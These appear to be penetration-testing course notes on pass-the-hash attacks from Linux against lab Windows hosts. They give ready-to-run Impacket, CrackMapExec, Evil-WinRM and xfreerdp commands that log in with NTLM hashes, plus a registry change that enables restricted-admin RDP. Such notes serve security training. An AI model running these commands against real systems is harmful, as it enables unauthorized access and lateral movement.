Using Linux

Using Impacket

  • impacket-wmiexec

  • impacket-atexec

  • impacket-smbexec

  • impacket-psexec

$ impacket-psexec administrator@10.129.201.126 -hashes :30B3783CE2ABF1AF70F77D0660CF3453

Using CrackMapExec

  • use --local-auth if you want to authenticate to a local admin

# crackmapexec smb 172.16.1.0/24 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453
# crackmapexec smb 10.129.201.126 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453 -x whoami

Using Evil-WinRM

  • use if smb is blocked or there if we don't have administrative rights

  • when using a domain account, include the domain name such as administrator@inlanefreight.htb

$ evil-winrm -i 10.129.201.126 -u Administrator -H 30B3783CE2ABF1AF70F77D0660CF3453

Using RDP

  • restricted admin mode should be enabled, if not, there will be an error

  • to enable restricted admin mode, use this command to add a registry key

c:\tools> reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

Pass the hash using RDP

$ xfreerdp  /v:10.129.201.126 /u:julio /pth:64F12CDDAA88057E06A81B54E73B949B

PreviousUsing WindowsNextPass the Ticket (Kerberos)

Last updated